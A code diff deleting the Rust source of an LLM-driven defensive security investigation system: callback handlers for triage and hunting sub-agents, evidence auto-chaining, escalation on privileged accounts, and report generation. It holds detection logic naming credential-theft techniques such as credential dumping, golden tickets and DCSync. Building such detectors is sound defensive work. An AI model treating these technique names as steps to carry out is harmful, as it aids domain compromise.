state from Redis. - async fn handle_query_tool(&self, call: &ToolCall) -> Result { - match call.name.as_str() { - "get_investigation_status" => { - let reader = ares_core::state::BlueStateReader::new(self.investigation_id.clone()); - let mut conn = redis::Client::open(self.redis_url.as_str())? - .get_connection_manager() - .await?; - match reader.load_state(&mut conn).await? { - Some(state) => { - let mut summary = format!( - "Investigation: {}\nStage: {:?}\n", - self.investigation_id, state.stage - ); - if !state.evidence.is_empty() { - summary - .push_str(&format!("Evidence items: {}\n", state.evidence.len())); - for (i, ev) in state.evidence.iter().enumerate().take(10) { - summary.push_str(&format!( - " {}. [{}] {}\n", - i + 1, - ev.evidence_type, - ev.value - )); - } - } - if !state.timeline.is_empty() { - summary - .push_str(&format!("Timeline events: {}\n", state.timeline.len())); - } - Ok(CallbackResult::Continue(summary)) - } - None => Ok(CallbackResult::Continue( - "Investigation state not yet initialized.".to_string(), - )), - } - } - "get_task_result" => { - let task_id = call.arguments["task_id"].as_str().unwrap_or("unknown"); - Ok(CallbackResult::Continue(format!( - "Task {task_id} result lookup not yet implemented — \ - sub-agent results are returned inline from dispatch tools." - ))) - } - "wait_for_all_tasks" => { - // In the inline dispatch model, tasks complete synchronously - Ok(CallbackResult::Continue( - "All dispatched tasks have completed (inline execution).".to_string(), - )) - } - _ => Ok(CallbackResult::Continue(format!( - "Unknown query tool: {}", - call.name - ))), - } - } - - /// Handle completion/lifecycle callbacks. - pub(super) fn handle_lifecycle_callback(call: &ToolCall) -> Option { - match call.name.as_str() { - "triage_complete" => { - let severity = call.arguments["severity"].as_str().unwrap_or("unknown"); - let summary = call.arguments["summary"].as_str().unwrap_or(""); - let escalate = call.arguments["escalate"].as_bool().unwrap_or(false); - let result = - format!("Triage complete: severity={severity}, escalate={escalate}. {summary}"); - Some(CallbackResult::TaskComplete { - task_id: "triage".into(), - result, - }) - } - "hunt_complete" => { - let findings = call.arguments["findings"].as_str().unwrap_or(""); - let confidence = call.arguments["confidence"].as_str().unwrap_or("medium"); - let result = format!("Hunt complete (confidence: {confidence}): {findings}"); - Some(CallbackResult::TaskComplete { - task_id: "threat_hunt".into(), - result, - }) - } - "lateral_complete" => { - let connections = call.arguments["connections_found"].as_u64().unwrap_or(0); - let summary = call.arguments["summary"].as_str().unwrap_or(""); - let result = - format!("Lateral analysis: {connections} connections found. {summary}"); - Some(CallbackResult::TaskComplete { - task_id: "lateral_analysis".into(), - result, - }) - } - "complete_investigation" => { - let summary = call.arguments["summary"].as_str().unwrap_or(""); - let result = format!("Investigation complete. {summary}"); - Some(CallbackResult::TaskComplete { - task_id: "investigation".into(), - result: result.to_string(), - }) - } - // escalate_investigation is handled async in dispatch_escalation_triage - "confirm_escalation" => { - let action = call.arguments["action"].as_str().unwrap_or("escalate"); - Some(CallbackResult::TaskComplete { - task_id: "escalation_triage".into(), - result: format!("Escalation confirmed: {action}"), - }) - } - "downgrade_escalation" => { - let reason = call.arguments["reason"].as_str().unwrap_or(""); - Some(CallbackResult::TaskComplete { - task_id: "escalation_triage".into(), - result: format!("Escalation downgraded: {reason}"), - }) - } - "request_reinvestigation" => { - let focus = call.arguments["focus"].as_str().unwrap_or(""); - Some(CallbackResult::Continue(format!( - "Reinvestigation queued with focus: {focus}" - ))) - } - "route_to_team" => { - let team = call.arguments["team"].as_str().unwrap_or("soc"); - let priority = call.arguments["priority"].as_str().unwrap_or("medium"); - Some(CallbackResult::TaskComplete { - task_id: "routing".into(), - result: format!("Routed to {team} team (priority: {priority})"), - }) - } - _ => None, - } - } -} - -#[async_trait::async_trait] -impl CallbackHandler for BlueCallbackHandler { - fn is_callback(&self, tool_name: &str) -> bool { - BLUE_HANDLED_TOOLS.contains(&tool_name) - } - - async fn handle_callback(&self, call: &ToolCall) -> Option> { - match call.name.as_str() { - // Dispatch tools — run sub-agent loops - "dispatch_triage" => Some(self.dispatch_triage(call).await), - "dispatch_threat_hunt" => Some(self.dispatch_threat_hunt(call).await), - "dispatch_lateral_analysis" => Some(self.dispatch_lateral_analysis(call).await), - - // Escalation — launches escalation triage sub-agent - "escalate_investigation" => Some(self.dispatch_escalation_triage(call).await), - - // Query tools - "get_investigation_status" | "get_task_result" | "wait_for_all_tasks" => { - Some(self.handle_query_tool(call).await) - } - - // Lifecycle callbacks - _ => Self::handle_lifecycle_callback(call).map(Ok), - } - } - - async fn on_token_usage(&self, usage: &TokenUsage, model: &str) { - if usage.input_tokens == 0 && usage.output_tokens == 0 { - return; - } - if let Ok(client) = redis::Client::open(self.redis_url.as_str()) { - if let Ok(mut conn) = client.get_connection_manager().await { - if let Err(e) = ares_core::token_usage::increment_blue_token_usage( - &mut conn, - &self.investigation_id, - usage.input_tokens.into(), - usage.output_tokens.into(), - model, - ) - .await - { - warn!(err = %e, "Failed to record blue token usage"); - } - } - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - #[test] - fn test_is_callback() { - let handler = BlueCallbackHandler { - provider: Arc::new(MockProvider), - dispatcher: Arc::new(MockDispatcher), - model: "test".into(), - investigation_id: "inv-test".into(), - alert: json!({}), - redis_url: "redis://localhost".into(), - }; - - assert!(handler.is_callback("dispatch_triage")); - assert!(handler.is_callback("dispatch_threat_hunt")); - assert!(handler.is_callback("dispatch_lateral_analysis")); - assert!(handler.is_callback("complete_investigation")); - assert!(handler.is_callback("escalate_investigation")); - assert!(handler.is_callback("get_investigation_status")); - assert!(!handler.is_callback("nmap_scan")); - assert!(!handler.is_callback("query_loki_logs")); - } - - #[test] - fn test_triage_complete_callback() { - let call = ToolCall { - id: "c1".into(), - name: "triage_complete".into(), - arguments: json!({ - "severity": "high", - "summary": "Kerberoasting detected", - "escalate": true, - }), - }; - let result = BlueCallbackHandler::handle_lifecycle_callback(&call).unwrap(); - match result { - CallbackResult::TaskComplete { result, .. } => { - assert!(result.contains("high")); - assert!(result.contains("escalate=true")); - } - _ => panic!("Expected TaskComplete"), - } - } - - #[test] - fn test_escalate_investigation_not_in_lifecycle_callbacks() { - // escalate_investigation is now handled async via dispatch_escalation_triage, - // not the static handle_lifecycle_callback - let call = ToolCall { - id: "c2".into(), - name: "escalate_investigation".into(), - arguments: json!({ - "reason": "Active lateral movement detected", - "severity": "critical", - }), - }; - assert!(BlueCallbackHandler::handle_lifecycle_callback(&call).is_none()); - } - - #[test] - fn test_complete_investigation_callback() { - let call = ToolCall { - id: "c3".into(), - name: "complete_investigation".into(), - arguments: json!({ - "summary": "True positive: credential theft confirmed", - }), - }; - let result = BlueCallbackHandler::handle_lifecycle_callback(&call).unwrap(); - match result { - CallbackResult::TaskComplete { result, .. } => { - assert!(result.contains("credential theft")); - } - _ => panic!("Expected TaskComplete"), - } - } - - #[test] - fn test_unknown_callback() { - let call = ToolCall { - id: "c4".into(), - name: "nmap_scan".into(), - arguments: json!({}), - }; - assert!(BlueCallbackHandler::handle_lifecycle_callback(&call).is_none()); - } - - // Minimal mock types for tests - struct MockProvider; - - #[async_trait::async_trait] - impl LlmProvider for MockProvider { - async fn chat( - &self, - _request: &ares_llm::provider::LlmRequest, - ) -> std::result::Result - { - unimplemented!("Mock provider") - } - fn name(&self) -> &str { - "mock" - } - } - - struct MockDispatcher; - - #[async_trait::async_trait] - impl ToolDispatcher for MockDispatcher { - async fn dispatch_tool( - &self, - _role: &str, - _task_id: &str, - _call: &ToolCall, - ) -> anyhow::Result { - Ok(ares_llm::ToolExecResult { - output: "mock result".to_string(), - error: None, - discoveries: None, - }) - } - } -} diff --git a/ares-orchestrator/src/blue/chaining.rs b/ares-orchestrator/src/blue/chaining.rs deleted file mode 100644 index 98138642..00000000 --- a/ares-orchestrator/src/blue/chaining.rs +++ /dev/null @@ -1,598 +0,0 @@ -//! Evidence auto-chaining for blue team investigations. -//! -//! When a task result contains evidence of certain types, this module -//! automatically spawns follow-up investigation tasks. This mirrors -//! the Python `EVIDENCE_CHAIN_MAP` / `_process_result_chains` logic -//! in `result_processing.py`. - -use std::collections::{HashMap, HashSet}; -use std::sync::LazyLock; - -use anyhow::Result; -use chrono::Utc; -use serde_json::Value; -use tracing::{debug, info}; - -use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult}; -use ares_llm::tool_registry::blue::BlueAgentRole; - -// ── Static configuration ─────────────────────────────────────────── - -/// Follow-up action descriptor produced by evidence chaining. -#[derive(Debug, Clone)] -struct ChainAction { - /// Task type to dispatch (e.g. `"threat_hunt"`, `"lateral_analysis"`). - task_type: &'static str, - /// Worker role that handles this task type. - role: BlueAgentRole, - /// Human-readable description embedded in the task params. - focus: &'static str, -} - -/// Evidence type to follow-up actions mapping. -/// -/// When a task result contains an evidence type key, the corresponding -/// actions are dispatched as follow-up sub-tasks (subject to dedup). -static EVIDENCE_CHAIN_MAP: LazyLock>> = - LazyLock::new(|| { - let mut m = HashMap::new(); - - m.insert( - "suspicious_ip", - vec![ChainAction { - task_type: "threat_hunt", - role: BlueAgentRole::ThreatHunter, - focus: "IP correlation analysis", - }], - ); - - m.insert( - "malicious_process", - vec![ChainAction { - task_type: "threat_hunt", - role: BlueAgentRole::ThreatHunter, - focus: "process ancestry and execution chain analysis", - }], - ); - - m.insert( - "lateral_movement", - vec![ChainAction { - task_type: "lateral_analysis", - role: BlueAgentRole::LateralAnalyst, - focus: "lateral movement path reconstruction", - }], - ); - - m.insert( - "credential_access", - vec![ChainAction { - task_type: "threat_hunt", - role: BlueAgentRole::ThreatHunter, - focus: "credential abuse pattern detection", - }], - ); - - m.insert( - "persistence_mechanism", - vec![ChainAction { - task_type: "threat_hunt", - role: BlueAgentRole::ThreatHunter, - focus: "persistence indicator sweep", - }], - ); - - m.insert( - "c2_communication", - vec![ChainAction { - task_type: "threat_hunt", - role: BlueAgentRole::ThreatHunter, - focus: "network IOC and C2 beacon analysis", - }], - ); - - m.insert( - "privilege_escalation", - vec![ - ChainAction { - task_type: "lateral_analysis", - role: BlueAgentRole::LateralAnalyst, - focus: "post-escalation lateral movement assessment", - }, - ChainAction { - task_type: "threat_hunt", - role: BlueAgentRole::ThreatHunter, - focus: "privilege escalation technique detection", - }, - ], - ); - - m - }); - -/// Users whose appearance in results triggers automatic escalation. -static CRITICAL_USERS: LazyLock> = LazyLock::new(|| { - let mut s = HashSet::new(); - s.insert("krbtgt"); - s.insert("administrator"); - s.insert("domain admins"); - s.insert("enterprise admins"); - s.insert("schema admins"); - s -}); - -// ── Public API ───────────────────────────────────────────────────── - -/// Process a completed task result and dispatch any follow-up tasks -/// dictated by the evidence chain map. -/// -/// Returns the list of newly dispatched task IDs (may be empty). -/// -/// `dispatched_chains` is the per-investigation dedup set: each entry -/// is `"{evidence_type}:{task_type}"`. The caller must persist this -/// set across calls for the same investigation. -pub async fn process_task_result( - result: &BlueTaskResult, - task_queue: &mut BlueTaskQueue, - investigation_id: &str, - dispatched_chains: &mut HashSet, -) -> Result> { - let payload = match (&result.success, &result.result) { - (true, Some(val)) => val, - _ => return Ok(Vec::new()), - }; - - let mut new_task_ids = Vec::new(); - - // 1. Extract evidence types from the result payload. - let evidence_types = extract_evidence_types(payload); - - for ev_type in &evidence_types { - if let Some(actions) = EVIDENCE_CHAIN_MAP.get(ev_type.as_str()) { - for action in actions { - let dedup_key = format!("{ev_type}:{}", action.task_type); - if dispatched_chains.contains(&dedup_key) { - debug!( - investigation_id, - evidence_type = ev_type.as_str(), - task_type = action.task_type, - "Skipping duplicate chain dispatch" - ); - continue; - } - - let task_id = - dispatch_chain_task(task_queue, investigation_id, action, ev_type).await?; - - dispatched_chains.insert(dedup_key); - new_task_ids.push(task_id); - } - } - } - - // 2. Check for critical user escalation. - if let Some(reason) = should_escalate(result) { - let escalation_dedup = "escalation:critical_user".to_string(); - if !dispatched_chains.contains(&escalation_dedup) { - info!( - investigation_id, - reason = reason.as_str(), - "Auto-escalating: critical user detected" - ); - - // Dispatch both golden ticket detection and DCSync detection. - for (task_type, focus) in [ - ( - "threat_hunt", - "golden ticket detection for critical user activity", - ), - ("threat_hunt", "DCSync detection for critical user activity"), - ] { - let sub_dedup = format!("escalation:{task_type}:{focus}"); - if dispatched_chains.contains(&sub_dedup) { - continue; - } - - let action = ChainAction { - task_type, - role: BlueAgentRole::ThreatHunter, - focus, - }; - let task_id = - dispatch_chain_task(task_queue, investigation_id, &action, "critical_user") - .await?; - dispatched_chains.insert(sub_dedup); - new_task_ids.push(task_id); - } - - dispatched_chains.insert(escalation_dedup); - } - } - - if !new_task_ids.is_empty() { - info!( - investigation_id, - count = new_task_ids.len(), - task_ids = ?new_task_ids, - "Auto-chained follow-up tasks" - ); - } - - Ok(new_task_ids) -} - -/// Check whether a task result warrants automatic escalation. -/// -/// Returns `Some(reason)` if escalation is warranted, `None` otherwise. -pub fn should_escalate(result: &BlueTaskResult) -> Option { - let payload = result.result.as_ref()?; - - // Check users_investigated array for critical user names. - if let Some(users) = payload.get("users_investigated").and_then(|v| v.as_array()) { - for user in users { - if let Some(name) = user.as_str() { - let lower = name.to_lowercase(); - let trimmed = lower.trim(); - if CRITICAL_USERS.contains(trimmed) { - return Some(format!("Critical user detected: {name}")); - } - } - } - } - - // Check evidence_highlights for critical user mentions. - if let Some(highlights) = payload - .get("evidence_highlights") - .and_then(|v| v.as_array()) - { - for highlight in highlights { - if let Some(text) = highlight.as_str() { - let lower = text.to_lowercase(); - for &critical in CRITICAL_USERS.iter() { - if lower.contains(critical) { - return Some(format!("Critical user '{critical}' mentioned in evidence")); - } - } - } - } - } - - // Check for high-severity indicators in the result. - if let Some(severity) = payload.get("severity").and_then(|v| v.as_str()) { - let sev_lower = severity.to_lowercase(); - if sev_lower == "critical" || sev_lower == "high" { - return Some(format!("High severity result: {severity}")); - } - } - - // Check findings text for critical user mentions. - if let Some(findings) = payload.get("findings").and_then(|v| v.as_str()) { - let lower = findings.to_lowercase(); - for &critical in CRITICAL_USERS.iter() { - if lower.contains(critical) { - return Some(format!("Critical user '{critical}' mentioned in findings")); - } - } - } - - None -} - -// ── Internals ────────────────────────────────────────────────────── - -/// Extract evidence type strings from a result payload. -/// -/// Looks for: -/// - `evidence_types`: `["suspicious_ip", ...]` -/// - `evidence`: `[{ "type": "suspicious_ip", ... }, ...]` -/// - `techniques_found`: maps MITRE technique IDs to evidence types -fn extract_evidence_types(payload: &Value) -> Vec { - let mut types = Vec::new(); - - // Direct evidence_types array - if let Some(arr) = payload.get("evidence_types").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - types.push(s.to_lowercase()); - } - } - } - - // Evidence objects with a "type" field - if let Some(arr) = payload.get("evidence").and_then(|v| v.as_array()) { - for item in arr { - if let Some(ev_type) = item.get("type").and_then(|v| v.as_str()) { - types.push(ev_type.to_lowercase()); - } - } - } - - // MITRE technique mapping (mirrors Python _process_result_chains) - if let Some(arr) = payload.get("techniques_found").and_then(|v| v.as_array()) { - for tech in arr { - if let Some(tech_str) = tech.as_str() { - let lower = tech_str.to_lowercase(); - if lower.contains("t1558") { - // Kerberoasting -> credential_access - types.push("credential_access".to_string()); - } else if lower.contains("t1003") { - // OS Credential Dumping -> credential_access - types.push("credential_access".to_string()); - } else if lower.contains("t1550") { - // Use Alternate Authentication Material -> lateral_movement - types.push("lateral_movement".to_string()); - } else if lower.contains("t1021") { - // Remote Services -> lateral_movement - types.push("lateral_movement".to_string()); - } else if lower.contains("t1053") || lower.contains("t1547") { - // Scheduled Task / Boot Autostart -> persistence_mechanism - types.push("persistence_mechanism".to_string()); - } else if lower.contains("t1071") || lower.contains("t1105") { - // Application Layer Protocol / Ingress Tool Transfer -> c2 - types.push("c2_communication".to_string()); - } else if lower.contains("t1068") || lower.contains("t1134") { - // Exploitation for Privilege Escalation / Access Token Manipulation - types.push("privilege_escalation".to_string()); - } - } - } - } - - // Dedup while preserving order - let mut seen = HashSet::new(); - types.retain(|t| seen.insert(t.clone())); - - types -} - -/// Dispatch a single chained follow-up task to the blue task queue. -async fn dispatch_chain_task( - task_queue: &mut BlueTaskQueue, - investigation_id: &str, - action: &ChainAction, - evidence_type: &str, -) -> Result { - let task_id = format!( - "chain_{}_{}_{}_{}", - action.task_type, - evidence_type, - &investigation_id.chars().take(8).collect::(), - &uuid::Uuid::new_v4().simple().to_string()[..8] - ); - - let params = serde_json::json!({ - "chained_from_evidence": evidence_type, - "focus": action.focus, - "auto_chained": true, - }); - - let task = BlueTaskMessage { - task_id: task_id.clone(), - investigation_id: investigation_id.to_string(), - task_type: action.task_type.to_string(), - role: action.role.as_str().to_string(), - params, - created_at: Utc::now().to_rfc3339(), - }; - - task_queue.submit_task(&task).await?; - - info!( - task_id = %task_id, - task_type = action.task_type, - evidence_type, - focus = action.focus, - investigation_id, - "Dispatched chained follow-up task" - ); - - Ok(task_id) -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - #[test] - fn test_extract_evidence_types_from_evidence_types_array() { - let payload = json!({ - "evidence_types": ["suspicious_ip", "lateral_movement"] - }); - let types = extract_evidence_types(&payload); - assert_eq!(types, vec!["suspicious_ip", "lateral_movement"]); - } - - #[test] - fn test_extract_evidence_types_from_evidence_objects() { - let payload = json!({ - "evidence": [ - { "type": "Credential_Access", "value": "hash123" }, - { "type": "c2_communication", "value": "beacon" } - ] - }); - let types = extract_evidence_types(&payload); - assert_eq!(types, vec!["credential_access", "c2_communication"]); - } - - #[test] - fn test_extract_evidence_types_from_techniques() { - let payload = json!({ - "techniques_found": ["T1558.003", "T1021.002"] - }); - let types = extract_evidence_types(&payload); - assert_eq!(types, vec!["credential_access", "lateral_movement"]); - } - - #[test] - fn test_extract_evidence_types_dedup() { - let payload = json!({ - "evidence_types": ["lateral_movement"], - "techniques_found": ["T1550.002"] - }); - let types = extract_evidence_types(&payload); - // "lateral_movement" appears from both sources but should only be listed once - assert_eq!(types, vec!["lateral_movement"]); - } - - #[test] - fn test_should_escalate_critical_user_in_users_investigated() { - let result = BlueTaskResult { - task_id: "t1".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "users_investigated": ["krbtgt", "normaluser"] - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("krbtgt")); - } - - #[test] - fn test_should_escalate_critical_user_in_highlights() { - let result = BlueTaskResult { - task_id: "t2".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "evidence_highlights": ["Found Administrator logon from unusual host"] - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("administrator")); - } - - #[test] - fn test_should_escalate_high_severity() { - let result = BlueTaskResult { - task_id: "t3".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "severity": "critical", - "summary": "Active data exfiltration" - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("critical")); - } - - #[test] - fn test_should_escalate_schema_admins() { - let result = BlueTaskResult { - task_id: "t4".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "users_investigated": ["Schema Admins"] - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("Schema Admins")); - } - - #[test] - fn test_should_not_escalate_normal_result() { - let result = BlueTaskResult { - task_id: "t5".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "users_investigated": ["svc_backup", "jsmith"], - "severity": "low" - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - assert!(should_escalate(&result).is_none()); - } - - #[test] - fn test_should_not_escalate_failed_result() { - let result = BlueTaskResult { - task_id: "t6".into(), - investigation_id: "inv1".into(), - success: false, - result: None, - error: Some("timeout".into()), - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - assert!(should_escalate(&result).is_none()); - } - - #[test] - fn test_should_escalate_findings_mention() { - let result = BlueTaskResult { - task_id: "t7".into(), - investigation_id: "inv1".into(), - success: true, - result: Some(json!({ - "findings": "Enterprise Admins group membership was modified" - })), - error: None, - completed_at: "2026-04-08T00:00:00Z".into(), - worker_agent: Some("hunter1".into()), - }; - let reason = should_escalate(&result); - assert!(reason.is_some()); - assert!(reason.unwrap().contains("enterprise admins")); - } - - #[test] - fn test_chain_map_coverage() { - // Verify all expected evidence types are present in the map - let expected = [ - "suspicious_ip", - "malicious_process", - "lateral_movement", - "credential_access", - "persistence_mechanism", - "c2_communication", - "privilege_escalation", - ]; - for ev_type in &expected { - assert!( - EVIDENCE_CHAIN_MAP.contains_key(ev_type), - "Missing evidence type in chain map: {ev_type}" - ); - } - } - - #[test] - fn test_privilege_escalation_dispatches_two_actions() { - let actions = EVIDENCE_CHAIN_MAP.get("privilege_escalation").unwrap(); - assert_eq!(actions.len(), 2); - let task_types: Vec<&str> = actions.iter().map(|a| a.task_type).collect(); - assert!(task_types.contains(&"lateral_analysis")); - assert!(task_types.contains(&"threat_hunt")); - } - - #[test] - fn test_critical_users_set() { - assert!(CRITICAL_USERS.contains("krbtgt")); - assert!(CRITICAL_USERS.contains("administrator")); - assert!(CRITICAL_USERS.contains("domain admins")); - assert!(CRITICAL_USERS.contains("enterprise admins")); - assert!(CRITICAL_USERS.contains("schema admins")); - assert!(!CRITICAL_USERS.contains("normaluser")); - } -} diff --git a/ares-orchestrator/src/blue/investigation.rs b/ares-orchestrator/src/blue/investigation.rs deleted file mode 100644 index 303b8f4c..00000000 --- a/ares-orchestrator/src/blue/investigation.rs +++ /dev/null @@ -1,572 +0,0 @@ -//! Investigation lifecycle management. -//! -//! Handles creating investigations, dispatching tasks to workers, -//! processing results, and driving the investigation to completion. - -use std::collections::HashSet; -use std::sync::Arc; - -use anyhow::{Context, Result}; -use chrono::Utc; -use tracing::{info, warn}; - -use ares_core::eval::workflow::evaluate_live_investigation; -use ares_core::state::blue_task_queue::{BlueTaskQueue, BlueTaskResult}; -use ares_core::state::{BlueStateReader, BlueStateWriter, RedisStateReader}; -use ares_llm::tool_registry::blue::BlueAgentRole; -use ares_llm::{ - run_agent_loop, AgentLoopConfig, AgentLoopOutcome, LlmProvider, LoopEndReason, ToolDispatcher, -}; - -use super::callbacks::BlueCallbackHandler; -use super::chaining; - -/// Represents a running investigation. -pub struct Investigation { - pub investigation_id: String, - pub alert: serde_json::Value, - pub model: String, - /// Red team operation ID for post-investigation scoring against ground truth. - pub operation_id: Option, - /// Custom report output directory. Falls back to `ARES_REPORT_DIR` env var, - /// then `~/.ares/reports/`. - pub report_dir: Option, - pub state_writer: BlueStateWriter, -} - -impl Investigation { - pub fn new( - investigation_id: String, - alert: serde_json::Value, - model: String, - operation_id: Option, - report_dir: Option, - ) -> Self { - let state_writer = BlueStateWriter::new(investigation_id.clone()); - Self { - investigation_id, - alert, - model, - operation_id, - report_dir, - state_writer, - } - } -} - -/// Run a complete investigation workflow driven by the orchestrator LLM. -/// -/// The orchestrator agent coordinates triage, threat hunting, and lateral -/// analysis by calling `dispatch_task` and processing results. -pub async fn run_investigation( - investigation: &Investigation, - provider: Arc, - dispatcher: Arc, - _task_queue: &mut BlueTaskQueue, - redis_url: &str, - conn: &mut redis::aio::ConnectionManager, -) -> Result { - info!( - investigation_id = %investigation.investigation_id, - "Starting blue team investigation" - ); - - // Load investigation env vars from Redis and inject into process environment. - // These are set by `ares-cli blue from-operation` and include GRAFANA_URL, - // GRAFANA_SERVICE_ACCOUNT_TOKEN, etc. needed by blue tools (e.g. Loki queries - // routed through Grafana's datasource proxy). - let env_key = format!("ares:blue:inv:{}:env_vars", investigation.investigation_id); - if let Ok(env_json) = redis::AsyncCommands::get::<_, String>(conn, &env_key).await { - if let Ok(env_map) = - serde_json::from_str::>(&env_json) - { - for (key, value) in &env_map { - // Only set if not already present — don't clobber orchestrator's own env - if std::env::var(key).is_err() { - std::env::set_var(key, value); - } - } - info!( - investigation_id = %investigation.investigation_id, - count = env_map.len(), - "Injected investigation env vars" - ); - } - } - - investigation - .state_writer - .initialize(conn, &investigation.alert) - .await - .context("Failed to initialize investigation state")?; - - // Acquire investigation lock (TTL 1 hour) - if let Ok(true) = investigation.state_writer.acquire_lock(conn, 3600).await { - info!( - investigation_id = %investigation.investigation_id, - "Acquired investigation lock" - ); - } - - investigation - .state_writer - .set_status(conn, "in_progress", None) - .await - .ok(); - - // Build the orchestrator system prompt - let role = BlueAgentRole::Orchestrator; - let tools = ares_llm::tool_registry::blue::blue_tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !ares_llm::tool_registry::blue::is_blue_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - let system_prompt = - ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities) - .context("Failed to build blue orchestrator system prompt")?; - - // Build the task prompt with alert context using the initial alert prompt template - let task_prompt = ares_llm::prompt::blue::build_initial_alert_prompt( - &investigation.investigation_id, - &investigation.alert, - investigation.operation_id.as_deref(), - ) - .context("Failed to build initial alert prompt")?; - - let config = AgentLoopConfig { - model: investigation.model.clone(), - max_steps: 75, - max_tool_calls_per_name: 25, - ..AgentLoopConfig::default() - }; - - // Wire blue callback handler for dispatch + query + lifecycle tools - let callback_handler = Arc::new(BlueCallbackHandler::new( - Arc::clone(&provider), - Arc::clone(&dispatcher), - investigation.model.clone(), - investigation.investigation_id.clone(), - investigation.alert.clone(), - redis_url.to_string(), - )); - - // Run the orchestrator agent loop - let outcome = run_agent_loop( - provider.as_ref(), - dispatcher, - &config, - &system_prompt, - &task_prompt, - role.as_str(), - &investigation.investigation_id, - &tools, - Some(callback_handler), - ) - .await; - - let investigation_outcome = process_outcome(&outcome, &investigation.investigation_id); - - // Auto-chain follow-up tasks based on discoveries from the agent loop. - let mut dispatched_chains: HashSet = HashSet::new(); - let mut chained_task_ids: Vec = Vec::new(); - - for discovery in &outcome.discoveries { - let synthetic_result = BlueTaskResult { - task_id: format!("discovery_{}", investigation.investigation_id), - investigation_id: investigation.investigation_id.clone(), - success: true, - result: Some(discovery.clone()), - error: None, - completed_at: Utc::now().to_rfc3339(), - worker_agent: Some("orchestrator".into()), - }; - - match chaining::process_task_result( - &synthetic_result, - _task_queue, - &investigation.investigation_id, - &mut dispatched_chains, - ) - .await - { - Ok(new_ids) => chained_task_ids.extend(new_ids), - Err(e) => { - warn!( - investigation_id = %investigation.investigation_id, - error = %e, - "Failed to process evidence chain" - ); - } - } - } - - if !chained_task_ids.is_empty() { - info!( - investigation_id = %investigation.investigation_id, - count = chained_task_ids.len(), - "Evidence auto-chaining dispatched follow-up tasks" - ); - } - - // Score investigation against red team ground truth - if let Some(op_id) = &investigation.operation_id { - score_against_ground_truth( - conn, - &investigation.investigation_id, - op_id, - &investigation.model, - &outcome, - ) - .await; - } - - // Update investigation status - let final_status = match &investigation_outcome { - InvestigationOutcome::Completed { verdict, .. } => { - info!( - investigation_id = %investigation.investigation_id, - verdict = %verdict, - steps = outcome.steps, - "Investigation completed" - ); - "completed" - } - InvestigationOutcome::Escalated { reason, .. } => { - warn!( - investigation_id = %investigation.investigation_id, - reason = %reason, - "Investigation escalated" - ); - "escalated" - } - InvestigationOutcome::Failed { error } => { - warn!( - investigation_id = %investigation.investigation_id, - error = %error, - "Investigation failed" - ); - "failed" - } - }; - - let error_msg = match &investigation_outcome { - InvestigationOutcome::Failed { error } => Some(error.as_str()), - _ => None, - }; - investigation - .state_writer - .set_status(conn, final_status, error_msg) - .await - .ok(); - - // Release investigation lock - investigation.state_writer.release_lock(conn).await.ok(); - - // Auto-generate investigation report - generate_report( - conn, - &investigation.investigation_id, - investigation.report_dir.as_deref(), - ) - .await; - - Ok(investigation_outcome) -} - -/// Resolve the report output directory. -/// -/// Priority: explicit `report_dir` > `ARES_REPORT_DIR` env var > `~/.ares/reports/`. -fn resolve_report_dir(report_dir: Option<&str>) -> std::path::PathBuf { - if let Some(dir) = report_dir { - return std::path::PathBuf::from(dir); - } - if let Ok(dir) = std::env::var("ARES_REPORT_DIR") { - return std::path::PathBuf::from(dir); - } - let home = std::env::var("HOME").unwrap_or_else(|_| ".".to_string()); - std::path::PathBuf::from(home).join(".ares").join("reports") -} - -/// Generate a markdown investigation report and write it to disk. -/// -/// Best-effort: logs warnings on failure rather than propagating errors. -pub(super) async fn generate_report( - conn: &mut redis::aio::ConnectionManager, - investigation_id: &str, - report_dir: Option<&str>, -) { - let reader = BlueStateReader::new(investigation_id.to_string()); - let state = match reader.load_state(conn).await { - Ok(Some(s)) => s, - Ok(None) => { - warn!( - investigation_id = investigation_id, - "Skipping report: investigation state not found" - ); - return; - } - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Skipping report: failed to load state" - ); - return; - } - }; - - let generator = match ares_core::reports::BlueTeamReportGenerator::new() { - Ok(g) => g, - Err(e) => { - warn!(error = %e, "Skipping report: failed to create report generator"); - return; - } - }; - - let report = match generator.generate_investigation(&state, &[]) { - Ok(r) => r, - Err(e) => { - warn!( - investigation_id = investigation_id, - error = %e, - "Failed to generate investigation report" - ); - return; - } - }; - - let reports_dir = resolve_report_dir(report_dir) - .join("blue") - .join("investigations"); - - if let Err(e) = std::fs::create_dir_all(&reports_dir) { - warn!( - error = %e, - "Failed to create reports directory" - ); - return; - } - - let report_path = reports_dir.join(format!("{investigation_id}.md")); - match std::fs::write(&report_path, &report) { - Ok(()) => { - info!( - investigation_id = investigation_id, - path = %report_path.display(), - "Investigation report written" - ); - } - Err(e) => { - warn!( - investigation_id = 